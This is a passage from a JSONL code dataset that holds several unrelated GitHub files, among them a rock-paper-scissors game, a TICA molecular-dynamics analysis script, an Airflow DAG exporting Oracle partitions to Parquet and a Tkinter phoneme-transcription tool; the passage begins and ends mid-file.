end in a tie, entering sudden death overtime\")\n self.play_round()\n\n print(\n f\"Final Score: Player One {self.score1}, Player Two \"\n f\"{self.score2}\\n\"\n )\n\n if self.score1 > self.score2:\n print(\"** PLAYER ONE IS THE CHAMPION **\")\n elif self.score2 > self.score1:\n print(\"** PLAYER TWO IS THE CHAMPION **\")\n\n print(\"Game over!\\n\")\n\n\nif __name__ == \"__main__\":\n COMPUTER_PLAYER = random.choice(\n [Player(), RandomPlayer(), CyclePlayer(), ReflectPlayer()]\n )\n GAME = Game(HumanPlayer(), COMPUTER_PLAYER)\n GAME.play_game()\n","repo_name":"danrneal/rock-paper-scissors","sub_path":"rps.py","file_name":"rps.py","file_ext":"py","file_size_in_byte":6139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"8660761976","text":"import multiprocessing as mp\r\nimport networkx as nx\r\n\r\n\r\ndef worker(process_id, n_processes, G, d):\r\n \"\"\"thread worker function\"\"\"\r\n n_nodes = len(G.nodes)\r\n local_dict = dict()\r\n for ii in range(int(n_nodes / n_processes * process_id), int(n_nodes / n_processes * (process_id + 1))):\r\n length = nx.single_source_shortest_path_length(G, ii)\r\n local_dict[ii] = length\r\n d[process_id] = local_dict\r\n\r\n\r\ndef optimized_shortest_path_length_all_pair(g, undirected=True):\r\n\r\n if g.is_directed() and undirected:\r\n g = g.to_undirected()\r\n\r\n if len(g.nodes) < 5000:\r\n return dict(nx.all_pairs_shortest_path_length(g))\r\n\r\n # create concurrency for the function all_pairs_shortest_path_length\r\n manager = mp.Manager()\r\n d = manager.dict()\r\n process = []\r\n n_processes = mp.cpu_count()\r\n\r\n # create different processes\r\n for i in range(n_processes):\r\n p = mp.Process(target=worker, args=(i, n_processes, g, d,))\r\n process.append(p)\r\n p.start()\r\n\r\n # rejoin processes\r\n for p in process:\r\n p.join()\r\n\r\n return_dict = dict()\r\n for ii in d.values():\r\n for node, length_dict in ii.items():\r\n return_dict[node] = length_dict\r\n return return_dict\r\n\r\n","repo_name":"lukebieri/bitcoinTopologySimulation","sub_path":"src/shortestPath.py","file_name":"shortestPath.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"22"} +{"seq_id":"39835513781","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def getLonelyNodes(self, root: TreeNode) -> List[int]:\n if not root:\n return []\n \n ans = []\n \n q = deque([(root, None)])\n \n while q:\n node, parent = q.popleft()\n \n if node.left: q.append((node.left, node))\n if node.right: q.append((node.right, node))\n \n if not parent or (parent.left and parent.right):\n continue\n \n ans.append(node.val)\n \n return ans","repo_name":"virtyaluk/leetcode","sub_path":"problems/1469/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"73930511417","text":"\"\"\"\nTest some lldb help commands.\n\nSee also CommandInterpreter::OutputFormattedHelpText().\n\"\"\"\n\nimport os, time\nimport unittest2\nimport lldb\nfrom lldbtest import *\n\nclass HelpCommandTestCase(TestBase):\n\n mydir = \"help\"\n\n def test_simplehelp(self):\n \"\"\"A simple test of 'help' command and its output.\"\"\"\n self.expect(\"help\",\n startstr = 'The following is a list of 
built-in, permanent debugger commands')\n\n    def version_number_string(self):\n        \"\"\"Helper function to find the version number string of lldb.\"\"\"\n        plist = os.path.join(os.getcwd(), os.pardir, os.pardir, \"resources\", \"LLDB-info.plist\")\n        try:\n            CFBundleVersionSegFound = False\n            with open(plist, 'r') as f:\n                for line in f:\n                    if CFBundleVersionSegFound:\n                        version_line = line.strip()\n                        import re\n                        m = re.match(\"<string>(.*)</string>\", version_line)\n                        if m:\n                            version = m.group(1)\n                            return version\n                        else:\n                            # Unsuccessful, let's just break out of the for loop.\n                            break\n\n                    if line.find(\"CFBundleVersion\") != -1:\n                        # Found our match. The next line contains our version\n                        # string, for example:\n                        # \n                        #     <string>38</string>\n                        CFBundleVersionSegFound = True\n\n        except:\n            # Just fallthrough...\n            import traceback\n            traceback.print_exc()\n            pass\n\n        # Use None to signify that we are not able to grok the version number.\n        return None\n\n\n    def test_help_version(self):\n        \"\"\"Test 'help version' and 'version' commands.\"\"\"\n        self.expect(\"help version\",\n            substrs = ['Show version of LLDB debugger.'])\n        version_str = self.version_number_string()\n        self.expect(\"version\",\n            patterns = ['LLDB-' + (version_str if version_str else '[0-9]+')])\n\n    def test_help_should_not_hang_emacsshell(self):\n        \"\"\"Command 'settings set term-width 0' should not hang the help command.\"\"\"\n        self.runCmd(\"settings set term-width 0\")\n        self.expect(\"help\",\n            startstr = 'The following is a list of built-in, permanent debugger commands')\n\n    def test_help_image_dump_symtab_should_not_crash(self):\n        \"\"\"Command 'help image dump symtab' should not crash lldb.\"\"\"\n        self.expect(\"help image dump symtab\",\n            substrs = ['image dump symtab',\n                       'sort-order'])\n\n    def test_help_image_du_sym_is_ambiguous(self):\n        \"\"\"Command 'help image du sym' is ambiguous and spits out the list of candidates.\"\"\"\n        self.expect(\"help image du sym\",\n            COMMAND_FAILED_AS_EXPECTED, error=True,\n            substrs = ['error: ambiguous command image du sym',\n                       'symfile',\n                       'symtab'])\n\n    def test_help_image_du_line_should_work(self):\n        \"\"\"Command 'help image du line' is not ambiguous and should work.\"\"\"\n        self.expect(\"help image du line\",\n            substrs = ['Dump the debug symbol file for one or more executable images'])\n\n\nif __name__ == '__main__':\n    import atexit\n    lldb.SBDebugger.Initialize()\n    atexit.register(lambda: lldb.SBDebugger.Terminate())\n    unittest2.main()\n","repo_name":"eightcien/lldb","sub_path":"test/help/TestHelp.py","file_name":"TestHelp.py","file_ext":"py","file_size_in_byte":3515,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"22"} +{"seq_id":"37311699291","text":"import logging\nfrom tqdm.auto import tqdm\nfrom typing import Tuple, List, Any\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pickle\nimport pyemma\nfrom deeptime.clustering import KMeans\nfrom deeptime.decomposition import TICA\nfrom deeptime.markov import TransitionCountEstimator, MaximumLikelihoodMSM\nfrom deeptime.plots import plot_implied_timescales\nfrom deeptime.util.validation import implied_timescales\nfrom pyemma.util.contexts import settings\nfrom sklearn.decomposition import PCA\nimport argparse\nimport yaml\n\ndef load_data(pdb_file: str, xtc_files: List[str], selection: str) -> Any:\n    \"\"\"\n    Load trajectory data for a given protein structure and feature selection.\n\n    Parameters\n    ----------\n    pdb_file : str\n        Path to the pdb file.\n    xtc_files : List[str]\n        List of paths to the xtc files.\n    selection : str\n        
Selection string for the protein residues/features to be considered.\n\n Returns\n -------\n Any\n Loaded trajectory data.\n \"\"\"\n feat = pyemma.coordinates.featurizer(pdb_file)\n selection = feat.select(selection)\n feat.add_distances(selection, periodic=False)\n data = pyemma.coordinates.load(xtc_files, features=feat)\n return data\n\ndef perform_pca(data: Any, n_components: int = 2) -> Tuple[PCA, List[np.ndarray]]:\n \"\"\"\n Perform Principal Component Analysis (PCA) on the trajectory data.\n\n Parameters\n ----------\n data : Any\n Trajectory data.\n n_components : int, optional\n Number of principal components to be computed, by default 2.\n\n Returns\n -------\n Tuple[PCA, List[np.ndarray]]\n Fitted PCA model and transformed trajectory data.\n \"\"\"\n pca = PCA(n_components=n_components)\n pca_output = [pca.fit_transform(traj) for traj in data]\n return pca, pca_output\n\ndef perform_tica(data: Any, lag: int, n_components: int = 2) -> Tuple[TICA, List[np.ndarray]]:\n \"\"\"\n Perform Time-lagged Independent Component Analysis (TICA) on the trajectory data.\n\n Parameters\n ----------\n data : Any\n Trajectory data.\n lag : int\n Time lag to be used for the TICA computation.\n n_components : int, optional\n Number of independent components to be computed, by default 2.\n\n Returns\n -------\n Tuple[TICA, List[np.ndarray]]\n Fitted TICA model and transformed trajectory data.\n \"\"\"\n tica_estimator = TICA(lagtime=lag, dim=n_components)\n tica = tica_estimator.fit_fetch(data)\n tica_output = [tica.transform(traj) for traj in data]\n return tica, tica_output\n\ndef cluster_data(data: List[np.ndarray], n_clusters: int, max_iter: int = 100, n_jobs: int = 2) -> Tuple[KMeans, List[int]]:\n \"\"\"\n Cluster the trajectory data using K-means algorithm.\n\n Parameters\n ----------\n data : List[np.ndarray]\n Trajectory data.\n n_clusters : int\n Number of clusters to be formed.\n max_iter : int, optional\n Maximum number of iterations for the K-means algorithm, by default 100.\n n_jobs : int, optional\n Number of jobs to be used for the computation, by default 2.\n\n Returns\n -------\n Tuple[KMeans, List[int]]\n Fitted KMeans model and list of cluster indices for each data point.\n \"\"\"\n cls = KMeans(n_clusters, max_iter=max_iter, n_jobs=n_jobs).fit(np.concatenate(data)[::10]).fetch_model()\n dtrajs = [cls.transform(traj) for traj in data]\n return cls, dtrajs\n\ndef compute_implied_timescales(dtrajs: List[int], lags: List[int]) -> np.ndarray:\n \"\"\"\n Compute the implied timescales for a given list of lag times.\n\n Parameters\n ----------\n dtrajs : List[int]\n List of cluster indices for each data point.\n lags : List[int]\n List of lag times to be used for the computation.\n\n Returns\n -------\n np.ndarray\n Computed implied timescales.\n \"\"\"\n return implied_timescales([MaximumLikelihoodMSM(lagtime=lag).fit_fetch(dtrajs) for lag in lags])\n\ndef save_to_pickle(data: Any, filename: str) -> None:\n \"\"\"\n Save data to a pickle file.\n\n Parameters\n ----------\n data : Any\n Data to be saved.\n filename : str\n Path to the pickle file.\n \"\"\"\n with open(filename, 'wb') as f:\n pickle.dump(data, f)\n\ndef load_from_pickle(filename: str) -> Any:\n \"\"\"\n Load data from a pickle file.\n\n Parameters\n ----------\n filename : str\n Path to the pickle file.\n\n Returns\n -------\n Any\n Loaded data.\n \"\"\"\n with open(filename, 'rb') as f:\n return pickle.load(f)\n\ndef save_tics_to_txt(tica_output: List[np.ndarray], sysName: str) -> None:\n \"\"\"\n Save the first two 
TICA components to text files.\n\n    Parameters\n    ----------\n    tica_output : List[np.ndarray]\n        Transformed trajectory data after TICA.\n    sysName : str\n        System name to be used for the output file names.\n    \"\"\"\n    # TODO: check if the tics folder exists before writing\n    np.savetxt(f'./tics/{sysName}_tica_tic1.txt', np.concatenate(tica_output)[:, 0], delimiter='\\n', fmt='%.10f')\n    np.savetxt(f'./tics/{sysName}_tica_tic2.txt', np.concatenate(tica_output)[:, 1], delimiter='\\n', fmt='%.10f')\n\ndef parse_args() -> argparse.Namespace:\n    \"\"\"\n    Parse command-line arguments.\n\n    Returns\n    -------\n    argparse.Namespace\n        Parsed command-line arguments.\n    \"\"\"\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"config\", help=\"Path to the configuration file\")\n    return parser.parse_args()\n\ndef load_config(config_path: str) -> dict:\n    \"\"\"\n    Load configuration from a yaml file.\n\n    Parameters\n    ----------\n    config_path : str\n        Path to the yaml configuration file.\n\n    Returns\n    -------\n    dict\n        Loaded configuration.\n    \"\"\"\n    with open(config_path, 'r') as f:\n        return yaml.safe_load(f)\n\nif __name__ == \"__main__\":\n    args = parse_args()\n    config = load_config(args.config)\n\n    pdb_file = config['pdb_file']\n    xtc_files = config['xtc_files']\n    sysName = config['sysName']\n    lag = config['lag']\n    n_components = config['n_components']\n    n_clusters = config['n_clusters']\n    lags = config['lags']\n    selection = config['selection']\n\n    logging.info(\"Loading data...\")\n    data = load_data(pdb_file, xtc_files, selection)\n    save_to_pickle(data, f'{sysName}.pickle')\n\n    logging.info(\"Performing PCA...\")\n    pca, pca_output = perform_pca(data, n_components)\n    logging.info(\"Performing TICA...\")\n    tica, tica_output = perform_tica(data, lag, n_components)\n\n    logging.info(\"Clustering data...\")\n    cls_pca, dtrajs_pca = cluster_data(pca_output, n_clusters)\n    cls_tica, dtrajs_tica = cluster_data(tica_output, n_clusters)\n\n    logging.info(\"Computing implied timescales...\")\n    its_pca = compute_implied_timescales(dtrajs_pca, lags)\n    its_tica = compute_implied_timescales(dtrajs_tica, lags)\n\n    save_to_pickle(tica_output, f'{sysName}_tica_output.pickle')\n    save_to_pickle(pca_output, f'{sysName}_pca_output.pickle')\n\n    save_tics_to_txt(tica_output, sysName)\n","repo_name":"engelberger/md-analysis-utils","sub_path":"tica/run_tica.py","file_name":"run_tica.py","file_ext":"py","file_size_in_byte":7008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"5931907790","text":"import pandas as pd\n\nfrom pes_match.parameters import CHECKPOINT_PATH, OUTPUT_PATH, OUTPUT_VARIABLES\n\n# Stage 2 File names\nmatchkey_unique = \"Stage_2_Matchkey_Unique_Matches\"\nmatchkey_nonunique = \"Stage_2_Matchkey_Conflict_Matches\"\nassociative = \"Stage_2_Associative_Unique_Matches\"\n\n# Read in and combine\ndf1 = pd.read_csv(\n    CHECKPOINT_PATH + matchkey_unique + \".csv\", iterator=False, index_col=False\n)[OUTPUT_VARIABLES]\ndf2 = pd.read_csv(\n    CHECKPOINT_PATH + matchkey_nonunique + \".csv\", iterator=False, index_col=False\n)[OUTPUT_VARIABLES]\ndf3 = pd.read_csv(\n    CHECKPOINT_PATH + associative + \".csv\", iterator=False, index_col=False\n)[OUTPUT_VARIABLES]\nStage_2_matches = pd.concat([df1, df2, df3]).reset_index(drop=True)\n\n# Combine with Stage 1 matches\nStage_1_matches = pd.read_csv(\n    OUTPUT_PATH + \"Stage_1_All_Matches.csv\", iterator=False, index_col=False\n)[OUTPUT_VARIABLES]\nall_matches = pd.concat([Stage_1_matches, Stage_2_matches])\n\n# Save to output 
folder\nall_matches.to_csv(OUTPUT_PATH + \"Stage_2_All_Matches.csv\", header=True, index=False)\n","repo_name":"Data-Linkage/pes_match","sub_path":"pipeline/2_Stage_2/03_stage_2_combine.py","file_name":"03_stage_2_combine.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"22"} +{"seq_id":"5166737288","text":"import copy\nimport logging\nfrom django.db import transaction\nfrom zentral.contrib.inventory.models import MachineSnapshot\n\n__all__ = ['BaseInventory', 'InventoryError']\n\nlogger = logging.getLogger('zentral.contrib.inventory.clients.base')\n\n\nclass InventoryError(Exception):\n pass\n\n\nclass BaseInventory(object):\n source_config_secret_attributes = None\n\n def __init__(self, config_d):\n if not hasattr(self, 'name'):\n self.name = self.__module__.split('.')[-1]\n config_d = copy.deepcopy(config_d)\n config_d.pop('backend')\n if self.source_config_secret_attributes:\n for attr in self.source_config_secret_attributes:\n config_d.pop(attr, None)\n self.source = {'module': self.__module__,\n 'name': self.name,\n 'config': config_d}\n\n def get_machines(self):\n raise NotImplementedError\n\n # inventory API\n def _events_from_diff(self, diff):\n events = []\n for m2m_attr, event_type in (('links', 'inventory_link_update'),\n ('osx_app_instances', 'inventory_osx_app_instance_update'),\n ('groups', 'inventory_group_update')):\n m2m_diff = diff.get(m2m_attr, {})\n for action in ['added', 'removed']:\n for obj in m2m_diff.get(action, []):\n obj['action'] = action\n if 'source' not in obj:\n obj['source'] = self.source\n events.append((event_type, obj))\n for fk_attr in ('reference',\n 'machine',\n 'business_unit',\n 'os_version',\n 'system_info',\n 'teamviewer'):\n event_type = 'inventory_{}_update'.format(fk_attr)\n fk_diff = diff.get(fk_attr, {})\n for action in ['added', 'removed']:\n obj = fk_diff.get(action, None)\n if obj:\n if isinstance(obj, dict):\n event = obj\n if 'source' not in obj:\n event['source'] = self.source\n else:\n event = {'source': self.source,\n fk_attr: obj}\n event['action'] = action\n events.append((event_type, event))\n return events\n\n def sync(self):\n for machine_d in self.get_machines():\n source = copy.deepcopy(self.source)\n try:\n serial_number = machine_d['machine']['serial_number']\n except KeyError:\n logger.warning('Machine w/o serial number. Client \"%s\". Reference \"%s\"',\n self.name, machine_d.get('reference', 'Unknown'))\n continue\n if not serial_number:\n logger.warning('Machine serial number blank. Client \"%s\". 
Reference \"%s\"',\n self.name, machine_d.get('reference', 'Unknown'))\n continue\n # source will be modified by mto\n machine_d['source'] = source\n for group_d in machine_d.get('groups', []):\n group_d['source'] = source\n business_unit_d = machine_d.get('business_unit', None)\n if business_unit_d:\n business_unit_d['source'] = source\n with transaction.atomic():\n machine_snapshot, created = MachineSnapshot.objects.commit(machine_d)\n if created:\n diff = machine_snapshot.update_diff()\n if diff is None:\n events = [('inventory_machine_added',\n {'source': self.source,\n 'machine_snapshot': machine_snapshot.serialize()})]\n else:\n events = self._events_from_diff(diff)\n yield machine_snapshot, events\n\n def add_machine_to_group(self, machine_snapshot, group_name):\n raise NotImplementedError\n","repo_name":"Mbatey88/zentral","sub_path":"zentral/contrib/inventory/clients/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"22"} +{"seq_id":"23725203225","text":"import os\nimport re\nimport logging\nfrom datetime import datetime, timedelta\n\nfrom airflow import DAG\nfrom airflow.decorators import task\nfrom airflow.operators.empty import EmptyOperator\nfrom airflow.providers.oracle.hooks.oracle import OracleHook\nfrom airflow.providers.postgres.hooks.postgres import PostgresHook\n\nimport pandas as pd\nimport pyarrow as pa\nimport pyarrow.parquet as pq\n#import snowflake.connector\n\nfrom helpers import export_partition_to_parquet, export_non_partitioned_table_to_parquet, get_high_value\n\n# Global variables\ntables_non_partitioned = ['CLIENT', 'ACCOUNT', 'CARD', 'COUNTRY', 'CURRENCY']\ntables_partitioned_by_day = ['TRANSACTION']\ntables_partitioned_by_month = []\n\npostgres_conn_id = 'postgres_metadata'\noracle_conn_id = \"oracle_neobank\"\nschema_name = 'NEOBANK'\n\n@task\ndef flush_database_monitoring_info():\n hook = OracleHook(oracle_conn_id=oracle_conn_id)\n conn = hook.get_conn()\n\n # Iterate through the list of tables to gather statistics\n flush_database_monitoring_info_query = \"\"\"\n BEGIN\n DBMS_STATS.FLUSH_DATABASE_MONITORING_INFO;\n END;\n \"\"\"\n\n with conn.cursor() as cursor:\n cursor.execute(flush_database_monitoring_info_query)\n\n@task\ndef get_tab_modifications():\n # Connect to Oracle and fetch data from USER_TAB_MODIFICATIONS\n oracle_hook = OracleHook(oracle_conn_id)\n oracle_conn = oracle_hook.get_conn()\n\n oracle_query = \"\"\"\n SELECT TABLE_NAME, PARTITION_NAME, SUBPARTITION_NAME, INSERTS, UPDATES, DELETES, TIMESTAMP AS TIMESTAMP_VAL, TRUNCATED, DROP_SEGMENTS\n FROM USER_TAB_MODIFICATIONS\n \"\"\"\n\n oracle_data = []\n with oracle_conn.cursor() as oracle_cursor:\n oracle_cursor.execute(oracle_query)\n for row in oracle_cursor.fetchall():\n row = list(row)\n row[6] = row[6].strftime(\"%Y-%m-%d %H:%M:%S\") # Convert datetime to string\n oracle_data.append(tuple(row))\n\n return oracle_data\n\n@task\ndef save_tab_modifications_snapshot(tab_modifications):\n # Connect to PostgreSQL and insert data into the snapshot_tab_modifications table\n postgres_hook = PostgresHook(postgres_conn_id)\n postgres_conn = postgres_hook.get_conn()\n\n postgres_insert_query = \"\"\"\n INSERT INTO snapshot_tab_modifications (\n snapshot_dt, table_owner, table_name, partition_name, subpartition_name, inserts, updates, deletes, \"timestamp\", truncated, drop_segments)\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\n \"\"\"\n\n snapshot_dt = datetime.now()\n with 
postgres_conn.cursor() as postgres_cursor:\n for row in tab_modifications:\n postgres_cursor.execute(postgres_insert_query, (snapshot_dt, schema_name,) + tuple(row))\n postgres_conn.commit()\n\n@task\ndef export_changed_data(tab_modifications):\n if tab_modifications is None:\n logging.error(\"No changed tables or partitions results found.\")\n return\n\n changed_tables = set()\n changed_partitions = set()\n\n for row in tab_modifications:\n table_name, partition_name, subpartition_name, inserts, updates, deletes, timestamp_val, truncated, drop_segments = tuple(row)\n\n if any([inserts, updates, deletes, truncated=='YES', drop_segments]):\n if partition_name is None:\n changed_tables.add(table_name)\n else:\n changed_partitions.add((table_name, partition_name))\n\n # Export changed tables from tables_non_partitioned\n for table_name in changed_tables:\n if table_name in tables_non_partitioned:\n export_non_partitioned_table_to_parquet(oracle_conn_id, table_name)\n\n # Export changed partitions\n for table_name, partition_name in changed_partitions:\n # Skip aggregated row\n if partition_name is not None:\n high_value = get_high_value(oracle_conn_id, table_name, partition_name)\n high_value_date = datetime.strptime(high_value, '%Y-%m-%d')\n partition_label = None\n\n if table_name in tables_partitioned_by_day:\n partition_label = high_value_date.strftime('%Y_%m_%d')\n elif table_name in tables_partitioned_by_month:\n partition_label = high_value_date.strftime('%Y_%m')\n\n if partition_label:\n export_partition_to_parquet(oracle_conn_id, table_name, partition_name, partition_label)\n\n# Define the DAG\ndefault_args = {\n 'owner': 'airflow',\n 'depends_on_past': False,\n 'start_date': datetime(2023, 3, 1),\n 'email_on_failure': False,\n 'email_on_retry': False,\n 'retries': 1,\n 'retry_delay': timedelta(minutes=5),\n}\n\ndag = DAG(\n \"oracle_to_snowflake\",\n default_args=default_args,\n description=\"Export changed partitions from Oracle to Parquet files\",\n schedule_interval='0 0 * * *', # run at midnight every day\n catchup=False,\n)\n\n# Define the task dependencies\nwith dag:\n flush_database_monitoring_info_task = flush_database_monitoring_info()\n tab_modifications = get_tab_modifications()\n save_tab_modifications_snapshot_task = save_tab_modifications_snapshot(tab_modifications)\n export_changed_data_task = export_changed_data(tab_modifications)\n\n final = EmptyOperator(task_id=f\"final\")\n\n flush_database_monitoring_info_task >> tab_modifications\n tab_modifications >> save_tab_modifications_snapshot_task\n tab_modifications >> export_changed_data_task >> final\n\n","repo_name":"Aleksey-Movchanyuk/partition-based-cdc","sub_path":"airflow/dags/oracle_to_snowflake_dag.py","file_name":"oracle_to_snowflake_dag.py","file_ext":"py","file_size_in_byte":5383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"23875560861","text":"import tkinter as tk\r\nfrom tkinter import ttk\r\nimport subprocess\r\nimport glob\r\nimport json\r\nfrom tkinter import filedialog # Import filedialog\r\nfrom os import path\r\n\r\n# Create a tkinter window\r\nroot = tk.Tk()\r\nroot.title(\"Auto-trans\")\r\n\r\n# Import the tcl file for the Forest theme\r\nroot.tk.call(\"source\", \"./Forest-ttk-theme-1.0/forest-dark.tcl\")\r\n\r\n# Set the theme with the theme_use method\r\nstyle = ttk.Style(root)\r\nstyle.theme_use(\"forest-dark\")\r\n\r\n# Create a BooleanVar with global scope\r\ntrans_check_var = tk.BooleanVar()\r\n\r\n# Function to run the 
Auto-trans script\r\ndef run_auto_trans():\r\n # Your Auto-trans script code here\r\n jsonfile = open(\"hiragana.json\", encoding='UTF-8', errors='ignore')\r\n pDict = json.load(jsonfile)\r\n jsonfile.close()\r\n \r\n wav_path = wav_entry.get()\r\n wav_path = wav_path + \"\\\\\"\r\n wav_files = glob.glob(f'{wav_path}*.wav')\r\n \r\n creating_ask = trans_check_var.get()\r\n auto_creating = False\r\n if creating_ask:\r\n auto_creating = True\r\n\r\n for filepath in wav_files:\r\n name = path.basename(filepath)\r\n name = path.splitext(name)[0]\r\n\r\n filepath = filepath.replace(\".wav\", \".trans\")\r\n trans_file = open(filepath, \"w+\")\r\n if auto_creating:\r\n nameLen = len(name)\r\n phoneme = \"Sil \"\r\n findCheck = False\r\n for i in range(0, nameLen):\r\n findCheck = False\r\n if i + 1 < nameLen:\r\n for obj in pDict:\r\n if obj['kana'] == (name[i] + name[i + 1]):\r\n phoneme += obj['phoneme'] + \" \"\r\n findCheck = True\r\n break\r\n if not findCheck:\r\n for obj in pDict:\r\n if obj['kana'] == (name[i]):\r\n phoneme += obj['phoneme'] + \" \"\r\n break\r\n else:\r\n for obj in pDict:\r\n if obj['kana'] == (name[i]):\r\n phoneme += obj['phoneme'] + \" \"\r\n break\r\n\r\n phoneme += \"Sil\"\r\n\r\n trans_file.write(phoneme)\r\n phonlist = phoneme.split()\r\n phonLen = len(phonlist)\r\n for i in range(0, phonLen):\r\n if i < phonLen - 1:\r\n trans_file.write(\"\\n[\" + phonlist[i] + \" \" + phonlist[i + 1] + \"]\")\r\n else:\r\n break\r\n\r\n trans_file.close()\r\n \r\n result_text.config(state=tk.NORMAL)\r\n result_text.delete(\"1.0\", tk.END)\r\n result_text.insert(tk.END, \"Process Completed!\")\r\n result_text.config(state=tk.DISABLED)\r\n\r\ndef browse_wav_directory():\r\n wav_directory = filedialog.askdirectory() # Open directory dialog\r\n wav_entry.delete(0, tk.END) # Clear any previous input\r\n wav_entry.insert(0, wav_directory) # Insert selected directory path\r\n\r\n# Create a frame for the Auto-trans page\r\nauto_trans_page = tk.Frame(root)\r\nauto_trans_page.pack(padx=20, pady=20)\r\n\r\n# Create a label and entry for the wav directory\r\nwav_label = tk.Label(auto_trans_page, text=\"Enter wav directory:\")\r\nwav_label.pack()\r\nwav_entry = tk.Entry(auto_trans_page)\r\nwav_entry.pack()\r\nbrowse_button = ttk.Button(auto_trans_page, text=\"Browse\", command=browse_wav_directory)\r\nbrowse_button.pack()\r\n\r\n# Create a checkbox for transcription writing\r\ntrans_check = ttk.Checkbutton(auto_trans_page, text=\"Write transcriptions automatically\", variable=trans_check_var)\r\ntrans_check.pack()\r\n\r\n# Create a \"Run\" button\r\nrun_button = ttk.Button(auto_trans_page, text=\"Run Auto-trans Script\", command=run_auto_trans)\r\nrun_button.pack()\r\n\r\n# Create a text widget for the script output\r\nresult_text = tk.Text(auto_trans_page, height=5, width=40, state=tk.DISABLED)\r\nresult_text.pack()\r\n\r\n# Start the tkinter main loop\r\nroot.mainloop()\r\n","repo_name":"bread-in-a-can/Canned-Bread-s-VOCALOIDDBTOOL-Swiss-Army-Knife","sub_path":"Auto_trans_GUI.py","file_name":"Auto_trans_GUI.py","file_ext":"py","file_size_in_byte":3927,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"22"} +{"seq_id":"7512672751","text":"from contextlib import contextmanager\nfrom os import PathLike\nfrom typing import Optional, Type, Union\n\nimport numpy as np\nimport pandas as pd\nfrom qtpy.QtWidgets import QApplication\nfrom skimage.transform import (\n AffineTransform,\n EuclideanTransform,\n ProjectiveTransform,\n 
SimilarityTransform,\n)\n\nfrom ._napping_navigator import NappingNavigator\nfrom .qt import NappingDialog, NappingViewer, NappingWidget\n\n\nclass NappingApplication:\n RESTART_RETURN_CODE = 1000\n\n def __init__(self) -> None:\n self._navigator = NappingNavigator()\n self._current_app: Optional[QApplication] = None\n self._current_widget: Optional[NappingWidget] = None\n self._current_source_viewer: Optional[NappingViewer] = None\n self._current_target_viewer: Optional[NappingViewer] = None\n self._transform_type: Optional[Type[ProjectiveTransform]] = None\n self._pre_transform: Optional[np.ndarray] = None\n self._post_transform: Optional[np.ndarray] = None\n self._current_transform: Optional[np.ndarray] = None\n self._current_source_coords: Optional[pd.DataFrame] = None\n self._current_transf_coords: Optional[pd.DataFrame] = None\n self._write_blocked = False\n\n def exec(self, app: Optional[QApplication] = None) -> None:\n return_code = NappingApplication.RESTART_RETURN_CODE\n while return_code == NappingApplication.RESTART_RETURN_CODE:\n self._current_app = app or QApplication([])\n assert self._navigator.current_source_img_file is not None\n self._current_source_viewer = self._create_source_viewer(\n self._navigator.current_source_img_file\n )\n assert self._navigator.current_target_img_file is not None\n self._current_target_viewer = self._create_target_viewer(\n self._navigator.current_target_img_file\n )\n self._current_widget = self._create_widget()\n assert self._navigator.current_control_points_file is not None\n if self._navigator.current_control_points_file.is_file():\n current_control_points = pd.read_csv(\n self._navigator.current_control_points_file,\n index_col=0,\n )\n if len(current_control_points.index) > 0:\n self.set_current_control_points(current_control_points)\n if (\n self._navigator.current_source_coords_file is not None\n and self._navigator.current_source_coords_file.is_file()\n ):\n current_source_coords = pd.read_csv(\n self._navigator.current_source_coords_file\n )\n if len(current_source_coords.index) > 0:\n self._current_source_coords = current_source_coords\n self._update_current_transform()\n self._update_current_transf_coords()\n self._current_source_viewer.control_points_changed_handlers.append(\n self._handle_control_points_changed\n )\n self._current_target_viewer.control_points_changed_handlers.append(\n self._handle_control_points_changed\n )\n self._current_source_viewer.show()\n self._current_target_viewer.show()\n self._current_widget.show()\n self._current_widget.refresh()\n return_code = self._current_app.exec()\n\n def exec_dialog(self, app: Optional[QApplication] = None) -> None:\n if app is None:\n app = QApplication([])\n dialog = self._create_dialog()\n if dialog.exec() == NappingDialog.DialogCode.Accepted:\n assert dialog.transform_type is not None\n self._transform_type = {\n NappingDialog.TransformType.EUCLIDEAN: EuclideanTransform,\n NappingDialog.TransformType.SIMILARITY: SimilarityTransform,\n NappingDialog.TransformType.AFFINE: AffineTransform,\n }[dialog.transform_type]\n if dialog.pre_transform_path is not None:\n self._pre_transform = np.load(dialog.pre_transform_path)\n else:\n self._pre_transform = None\n if dialog.post_transform_path is not None:\n self._post_transform = np.load(dialog.post_transform_path)\n else:\n self._post_transform = None\n if dialog.selection_mode == NappingDialog.SelectionMode.FILE:\n assert dialog.source_img_path is not None\n assert dialog.target_img_path is not None\n assert 
